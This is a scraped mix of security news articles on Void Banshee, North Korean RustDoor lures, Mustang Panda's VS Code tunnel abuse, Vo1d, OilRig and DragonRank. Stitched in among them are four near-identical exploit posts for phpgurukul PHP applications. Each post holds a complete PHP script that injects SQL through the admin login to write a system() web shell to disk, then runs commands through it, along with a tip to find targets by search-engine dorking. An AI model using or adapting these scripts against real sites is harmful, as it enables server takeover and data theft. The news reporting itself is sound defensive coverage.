Attackers have been using the Windows MSHTML Platform spoofing vulnerability in conjunction with another zero-day flaw.

Source: Anucha Cheechang via Shutterstock

Microsoft has recategorized a bug that the company fixed in this month's Patch Tuesday update as a zero-day vulnerability, which the "Void Banshee" advanced persistent threat group has been exploiting since before July.

The bug, identified as CVE-2024-43461, is a remotely exploitable platform-spoofing vulnerability in the legacy MSHTML (Trident) browser engine that Microsoft continues to include in Windows for backward compatibility purposes, and it's one of two very similar issues that Void Banshee is using in its attacks.

**Affects All Supported Windows Versions**

The vulnerability affects all supported versions of Windows and gives remote attackers a way to execute arbitrary code on affected systems. An attacker, however, would need to convince a potential victim to visit a malicious Web page or to click on an unsafe link for any exploit to work.

Microsoft assigned the flaw a severity rating of 8.8 on the 10-point CVSS scale when it initially disclosed the bug on Sept. 10. At that time, the company's advisory made no mention of the vulnerability being a zero-day bug. Microsoft revised that assessment on Sept. 13 to indicate attackers had, in fact, actively been exploiting the flaw "as part of an attack chain \[related\] to CVE-2024-38112," a MSHTML platform spoofing vulnerability that the company patched in July 2024.

"We released a fix for CVE-2024-38112 in our July 2024 security updates which broke this attack chain," Microsoft said in its updated advisory.

The company wants customers to apply its patches from both the July 2024 update and the September 2024 update to fully protect themselves against exploits targeting CVE-2024-43461. Following Microsoft's Sept. 13 update, the US Cybersecurity and Infrastructure Security Agency (CISA) on Sept. 16 added the flaw to its known exploited vulnerabilities database with a deadline of Oct. 7 for federal agencies to implement the vendor's mitigations for it.

CVE-2024-43461 is similar to CVE-2024-38112 in that it allows an attacker to cause a user-interface — in this case, the browser — to display erroneous data. Check Point Research, which Microsoft has credited with discovering CVE-2024-38112, has described the flaw as allowing an adversary to send a crafted URL or Internet shortcut file that when clicked would trigger Internet Explorer — even when disabled — to open a malicious URL. Check Point said it had observed threat actors also use a separate novel trick for dressing up malicious HTML application (HTA) files as innocuous-looking PDF documents when exploiting the flaw.

Trend Micro's Zero Day Initiative (ZDI), which has also claimed credit for discovering CVE-2024-38112 — and has a beef with Microsoft for not acknowledging them — later reported Void Banshee as exploiting the vulnerability to drop the Atlantida malware on Windows systems. In the attacks that Trend Micro observed, the threat actor lured victims using malicious files spoofed as book PDFs that they distributed via Discord servers, file-sharing websites and other vectors. Void Banshee is a financially motivated threat actor that researchers have observed targeting organizations in North America, Southeast Asia, and Europe.

**A Two-Bug Microsoft Attack Chain**

According to Microsoft's updated advisory, it turns out that attackers have been using CVE-2024-43461 as part of an attack chain also involving CVE-2024-38112. Researchers at Qualys previously noted that exploits against CVE-2024-38112 would work equally well for CVE-2024-43416, because both are near-identical flaws.

Peter Girnus, senior threat researcher at ZDI who Microsoft has credited for CVE-2024-43461, says the attackers used CVE-2024-38112 to navigate to an HTML landing page through Internet Explorer using the MHTML protocol handler inside of a .URL file. "This landing page contains an <iframe> which downloads an HTA file where the HTA extension is spoofed using CVE-2024-43461" to make the file appear to be a PDF to the victim, he says.

Girnus says ZDI was aware that the attackers were exploiting CVE-2024-43461 but assumed the patch for CVE-2024-38112 fixed the issue. "We however reversed this patch to realize that the spoofing vulnerability was not fixed. We promptly alerted Microsoft," he says.

In its July report on Void Banshee exploiting CVE-2024-38112, Trend Micro said the flaw is a prime example of how organizations can get tripped up by "unsupported Windows relics" such as MSHTML, and end up having attackers drop ransomware, backdoors, and other malware on their systems. The attack surface is significant, too: A study that Sevco conducted of 500,000 Windows 10 and Windows 11 systems in the immediate aftermath of Microsoft's disclosure of CVE-2024-38112 showed that more than 10% are missing any kind of endpoint protection control and nearly 9% are missing controls for patch management, leaving them completely blind to threats.

“Environmental vulnerabilities such as missing endpoint security or patch management controls on devices combined with CVE vulnerabilities compound the risk that companies will leave paths to data exposed and allow malicious actors to exploit vulnerabilities like \[CVE-2024-43461\]," says Greg Fitzgerald, co-founder of Sevco. "It's critical for enterprises to take the first step of patching this vulnerability, but it can't stop there."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

'Void Banshee' Exploits Second Microsoft Zero-Day

Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.
The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by claiming to be a recruiter for a legitimate decentralized

Financial Security / Malware

Cybersecurity researchers are continuing to warn about North Korean threat actors' attempts to target prospective victims on LinkedIn to deliver malware called RustDoor.

The latest advisory comes from Jamf Threat Labs, which said it spotted an attack attempt in which a user was contacted on the professional social network by claiming to be a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.

The malicious cyber activity is part of a multi-pronged campaign unleashed by cyber threat actors backed by the Democratic People's Republic of Korea (DPRK) to infiltrate networks of interest under the pretext of conducting interviews or coding assignments.

The financial and cryptocurrency sectors are among the top targets for the state-sponsored adversaries seeking to generate illicit revenues and meet an ever-evolving set of objectives based on the regime's interests.

These attacks manifest in the form of "highly tailored, difficult-to-detect social engineering campaigns" aimed at employees of decentralized finance ("DeFi"), cryptocurrency, and similar businesses, as recently highlighted by the U.S. Federal Bureau of Investigation (FBI) in an advisory.

One of the notable indicators of North Korean social engineering activity relates to requests to execute code or download applications on company-owned devices, or devices that have access to a company's internal network.

Another aspect worth mentioning is that such attacks also involve "requests to conduct a 'pre-employment test' or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories."

Instances featuring such tactics have been extensively documented in recent weeks, underscoring a persistent evolution of the tools used in these campaigns against targets.

The latest attack chain detected by Jamf entails tricking the victim into downloading a booby-trapped Visual Studio project as part of a purported coding challenge that embeds within it bash commands to download two different second-stage payloads ("VisualStudioHelper" and "zsh\_env") with identical functionality.

This stage two malware is RustDoor, which the company is tracking as Thiefbucket. As of writing, none of the anti-malware engines have flagged the zipped coding test file as malicious. It was uploaded to the VirusTotal platform on August 7, 2024.

"The config files embedded within the two separate malware samples shows that the VisualStudioHelper will persist via cron while zsh\_env will persist via the zshrc file," researchers Jaron Bradley and Ferdous Saljooki said.

RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency firms. A subsequent analysis by S2W uncovered a Golang variant dubbed GateDoor that's meant for infecting Windows machines.

The findings from Jamf are significant, not only because they mark the first time the malware has been formally attributed to North Korean threat actors, but also for the fact that the malware is written in Objective-C.

VisualStudioHelper is also designed to act as an information stealer by harvesting files specified in the configuration, but only after prompting the user to enter their system password by masquerading it as though it's originating from the Visual Studio app to avoid raising suspicion.

Both the payloads, however, operate as a backdoor and use two different servers for command-and-control (C2) communications.

"Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry," the researchers said. "It's important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask users to run software of any type.

"These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware

Men Salon Management System version 2.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Men Salon Management System 2.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/men-salon-management-system-using-php-and-mysql/                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/msms/';// مسار ثابت لرفع الملف$path = 'C:\www\msms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Men Salon Management System 2.0 PHP Code Injection 

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/atsms/';// مسار ثابت لرفع الملف$path = 'C:\www\atsms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Auto/Taxi Stand Management System 1.0 PHP Code Injection

A technique to abuse Microsoft's built-in source code editor has finally made it into the wild, thanks to China's Mustang Panda APT.

Source: Postmodern Studio via Alamy Stock Photo

A Chinese state-aligned espionage group has become the first documented threat actor to weaponize a known exploit in VS Code in a malicious attack.

Visual Studio Code, or VS Code, is Microsoft's free source code editor for Windows, Linux, and macOS. According to Stack Overflow's 2023 survey of 86,544 developers, it's the most popular integrated development environment (IDE) among both new (78%) and professional developers (74%), by some distance. The next most popular IDE, Visual Studio, was used by 28% of respondents.

In September 2023, a threat researcher described how an attacker could take advantage of a VS Code feature called "Tunnel" to gain initial access to a target's environment. Initially, the tactic was just fodder for red teaming. Now, according to Palo Alto Networks' Unit 42, China's Mustang Panda (aka Stately Taurus, Bronze President, RedDelta, Luminous Moth, Earth Preta, and Camaro Dragon) has used it in an espionage attack against a government entity in southeast Asia.

"The technique described requires an attacker to have previously gained code execution privileges on a target machine," a Microsoft spokesperson tells Dark Reading. "As a security best practice, we encourage customers to practice good computing habits online, including exercising caution when clicking on links to web pages or opening unknown files."

**Turning VS Code Into a Reverse Shell**

"One of the worst fears as a cybersecurity expert is detecting and preventing a signed reverse shell binary," Truvis Thornton wrote, a whole year prior to Unit 42's latest research. "Guess what? Microsoft gladly gave us one."

First introduced in July 2023, VS Code Tunnel allows users to share their VS Code environments on the open Web, and only requires authentication through a GitHub account.

An attacker with their victim's GitHub credentials could do damage, but much worse is the fact that one can remotely install a portable version of VS Code on a targeted machine. Because it's a legitimate signed binary, it will not be flagged as suspicious by security software.

And yet, it will walk and talk like a reverse shell. By running the command "code.exe tunnel," the attacker opens a GitHub authentication page, which they can log into with their own account. Then they're redirected to a VS Code environment connected to their target's system, and free to execute commands and scripts and introduce new files at will.

Mustang Panda — a 12-year-old advanced persistent threat (APT) known for espionage against governments, nongovernmental organizations (NGOs), and religious groups in Asia and Europe — used this playbook to perform reconnaissance against its target, drop malware, and, most importantly for its purposes, exfiltrate sensitive data.

**How to Deal with VSCode**

"While the abuse of VSCode is concerning, in our opinion, it is not a vulnerability," Assaf Dahan, director of threat research for Unit 42, clarifies. Instead, he says, "It's a legitimate feature that was abused by threat actors, as often happens with many legitimate software (take lolbins, for example)."

And there are a number of ways organizations can protect against a bring-your-own-VSCode attack. Besides hunting for indicators of compromise (IoCs), he says, "It's also important to consider whether the organization would want to limit or block the use of VSCode on endpoints of employees that are not developers or do not require the use of this specific app. That can reduce the attack surface." 

"Lastly, consider limiting access to the VSCode tunnel domains '.tunnels.api.visualstudio\[.\]com' or '.devtunnels\[.\]ms' to users with a valid business requirement. Notice that these domains are legitimate and are not malicious, but limiting access to them will prevent the feature from working properly and consequently make it less attractive for threat actors," he adds.

**A Second, Overlapping Attack**

While investigating the Mustang Panda attack, Unit 42 came across a second threat cluster occupying the same target's systems.

In this case, the attacker abused imecmnt.exe — a legitimate and signed file associated with Microsoft's Input Method Editor (IME), used for generating text in languages not conducive to the QWERTY keyboard — with some dynamic link library (DLL) sideloading. The file they dropped, ShadowPad, is a 7-year-old modular backdoor popular among Chinese threat actors.

This compromise occurred at the same time as the VS Code exploitation, often on the same endpoints, and the overlaps didn't end there. Still, researchers couldn't say for certain whether this second cluster of malicious activity could be attributed to Mustang Panda. "There could also be other possible scenarios to explain this connection," they wrote. "For example, it could be a joint effort between two Chinese APT groups or perhaps two different groups piggybacking on each other's access."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Microsoft VS Code Undermined in Asian Spy Attack

Nipah Virus Testing Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/nipah-tms/';// مسار ثابت لرفع الملف$path = 'C:\www\nipah-tms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Nipah Virus Testing Management System 1.0 PHP Code Injection

Emergency Ambulance Hiring Portal version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/eahp/';// مسار ثابت لرفع الملف$path = 'C:\www\eahp\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Emergency Ambulance Hiring Portal 1.0 PHP Code Injection

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).
"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus

Nearly 1.3 million Android-based TV boxes running outdated versions of the operating system and belonging to users spanning 197 countries have been infected by a new malware dubbed Vo1d (aka Void).

"It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software," Russian antivirus vendor Doctor Web said in a report published today.

A majority of the infections have been detected in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.

It's currently not known what the source of the infection is, although it's suspected that it may have either involved an instance of prior compromise that allows for gaining root privileges or the use of unofficial firmware versions with built-in root access.

The following TV models have been targeted as part of the campaign -

*   KJ-SMART4KVIP (Android 10.1; KJ-SMART4KVIP Build/NHG47K)
*   R4 (Android 7.1.2; R4 Build/NHG47K)
*   TV BOX (Android 12.1; TV BOX Build/NHG47K)

The attack entails the substitution of the "/system/bin/debuggerd" daemon file (with the original file moved to a backup file named "debuggerd\_real"), as well as the introduction of two new files – "/system/xbin/vo1d" and "/system/xbin/wd" – which contain the malicious code and operate concurrently.

"Before Android 8.0, crashes were handled by the debuggerd and debuggerd64 daemons," Google notes in its Android documentation. "In Android 8.0 and higher, crash\_dump32 and crash\_dump64 are spawned as needed."

Two different files shipped as part of the Android operating system – install-recovery.sh and daemonsu – have been modified as part of the campaign to trigger the execution of the malware by starting the "wd" module.

"The trojan's authors probably tried to disguise one if its components as the system program '/system/bin/vold,' having called it by the similar-looking name 'vo1d' (substituting the lowercase letter 'l' with the number '1')," Doctor Web said.

The "vo1d" payload, in turn, starts "wd" and ensures it's persistently running, while also downloading and running executables when instructed by a command-and-control (C2) server. Furthermore, it keeps tabs on specified directories and installs the APK files that it finds in them.

"Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: New Vo1d Malware Infects 1.3 Million Android TV Boxes Worldwide

Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called OilRig.
The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis.
OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug,

Iraqi government networks have emerged as the target of an "elaborate" cyber attack campaign orchestrated by an Iran state-sponsored threat actor called **OilRig**.

The attacks singled out Iraqi organizations such as the Prime Minister's Office and the Ministry of Foreign Affairs, cybersecurity company Check Point said in a new analysis.

OilRig, also called APT34, Crambus, Cobalt Gypsy, GreenBug, Hazel Sandstorm (formerly EUROPIUM), and Helix Kitten, is an Iranian cyber group associated with the Iranian Ministry of Intelligence and Security (MOIS).

Active since at least 2014, the group has a track record of conducting phishing attacks in the Middle East to deliver a variety of custom backdoors such as Karkoff, Shark, Marlin, Saitama, MrPerfectionManager, PowerExchange, Solar, Mango, and Menorah for information theft.

The latest campaign is no exception in that it involves the use of a new set of malware families dubbed Veaty and Spearal, which come with capabilities to execute PowerShell commands and harvest files of interest.

"The toolset used in this targeted campaign employs unique command-and-control (C2) mechanisms, including a custom DNS tunneling protocol, and a tailor-made email based C2 channel," Check Point said.

"The C2 channel uses compromised email accounts within the targeted organization, indicating that the threat actor successfully infiltrated the victim's networks."

Some of the actions that the threat actor took in executing the attack, and following it, were consistent with tactics, techniques, and procedures (TTPs) that OilRig has employed when carrying out similar operations in the past.

This includes the use of email-based C2 channels, specifically leveraging previously compromised email mailboxes to issue commands and exfiltrate data. This modus operandi has been common to several backdoors such as Karkoff, MrPerfectionManager, and PowerExchange.

The attack chain is kicked off via deceptive files masquerading as benign documents ("Avamer.pdf.exe" or "IraqiDoc.docx.rar") that, when launched, pave the way for the deployment of Veaty and Spearal. The infection pathway is likely said to have involved an element of social engineering.

The files initiate the execution of intermediate PowerShell or Pyinstaller scripts that, in turn, drop the malware executables and their XML-based configuration files, which include information about the C2 server.

"The Spearal malware is a .NET backdoor that utilizes DNS tunneling for \[C2\] communication," Check Point said. "The data transferred between the malware and the C2 server is encoded in the subdomains of DNS queries using a custom Base32 scheme."

Spearal is designed to execute PowerShell commands, read file contents and send it in the form of Base32-encoded data, and retrieve data from the C2 server and write it to a file on the system.

Also written .NET, Veaty leverages emails for C2 communications with the end goal of downloading files and executing commands via specific mailboxes belonging to the gov-iq.net domain. The commands allow it to upload/download files and run PowerShell scripts.

Check Point said its analysis of the threat actor infrastructure led to the discovery of a different XML configuration file that's likely associated with a third SSH tunneling backdoor.

It further identified an HTTP-based backdoor, CacheHttp.dll, that targets Microsoft's Internet Information Services (IIS) servers and examines incoming web requests for "OnGlobalPreBeginRequest" events and executes commands when they occur.

"The execution process begins by checking if the Cookie header is present in incoming HTTP requests and reads until the; sign," Check Point said. "The main parameter is F=0/1 which indicates whether the backdoor initializes its command configuration (F=1) or runs the commands based on this configuration (F=0)."

The malicious IIS module, which represents an evolution of a malware classified as Group 2 by ESET in August 2021 and another APT34 IIS backdoor codenamed RGDoor, supports command execution and file read/write operations.

"This campaign against Iraqi government infrastructure highlights the sustained and focused efforts of Iranian threat actors operating in the region," the company said.

"The deployment of a custom DNS tunneling protocol and an email-based C2 channel leveraging compromised accounts highlights the deliberate effort by Iranian actors to develop and maintain specialized command-and-control mechanisms."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Cyber Group OilRig Targets Iraqi Government in Sophisticated Malware Attack

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO…

DragonRank, a Chinese-speaking hacking group, has compromised 30+ Windows servers globally. They exploit IIS vulnerabilities to manipulate SEO rankings, distribute scam websites, and spread malware like PlugX and BadIIS.

A Chinese-speaking hacking group, known as “DragonRank,” has been discovered compromising over 30 Windows servers across the globe, including in Thailand, India, Korea, Belgium, Netherlands, and China.

The group’s primary goal is to manipulate search engine crawlers and disrupt the Search Engine Optimization (SEO) of affected sites, ultimately distributing scam websites to unsuspecting users.

One of the DragonRank’s advertisement websites on Google is plagued with malware

****How the Attack Works****

The DragonRank hacking group gains initial access to Windows Internet Information Services (IIS) servers by exploiting vulnerabilities in web application services, such as phpMyAdmin, WordPress, or similar web applications. Once they obtain the ability to execute remote code or upload files on the targeted site, they deploy a web shell like ASPXspy, granting them control over the compromised server.

According to Cisco Talos’ long and technical report shared with Hackread.com ahead of publishing on Tuesday, the group then utilizes the web shell to collect system information and launch malware, including PlugX and BadIIS, as well as credential-harvesting utilities like Mimikatz, PrintNotifyPotato, BadPotato, and GodPotato. They also breach additional Windows IIS servers in the target’s network, either through web shell deployment or by exploiting remote desktop logins using acquired credentials.

For your information, PlugX is a well-known RAT (remote access tool) equipped with modular plugins and property configurations, deployed by various Chinese-speaking cyber threat actors for over ten years. The PlugX configuration in this campaign contains all necessary values and information to properly run the executable.

On the other hand, BadIIS is a malware used to manipulate search engine crawlers and hyperlink jumps. The version of BadIIS detected in this campaign shares similar traits with the one mentioned (PDF) at Black Hat USA 2021, including configuration as an IIS proxy and capabilities for SEO fraud.

Interestingly, researchers also noted that DragonRank operates much like a business, with a commercial website offering their services in both Chinese and English. They engage with clients through platforms like Telegram and QQ, providing tailored SEO fraud services. Their business model includes a cautionary note about transaction confirmations, suggesting they operate with a level of professionalism uncommon in typical cybercrime groups.

Nevertheless, the DragonRank hacking group’s activities are a threat to online security, as they can drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings.

These attacks can harm a company’s online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. Therefore, businesses and IT departments must:

*   **Use Advanced Threat Detection:** Implement solutions that can detect and respond to sophisticated malware like PlugX.
*   **Regularly Update Security Measures:** Ensure all systems, especially web servers, are patched against known vulnerabilities.
*   **Monitor Network Traffic:** Look for unusual outbound connections or changes in server behavior that might indicate malware like BadIIS.
*   **Educate Staff:** Awareness training on cyber threats can help in early detection of phishing or other social engineering attempts.

1.  **Chinese SMS Phishing Group Hits iPhone Users in India Post Scam**
2.  **ValleyRAT Malware Targets Chinese Windows Users in New Attack**
3.  **Chinese Velvet Ant APT Target F5 Devices in Years-Long Espionage**
4.  **“Unfading Sea Haze” Hackers Hit Military Targets in South China Sea**
5.  **Chinese Blackwood APT Deploys NSPX30 Backdoor in Cyberespionage**

Tag

#backdoor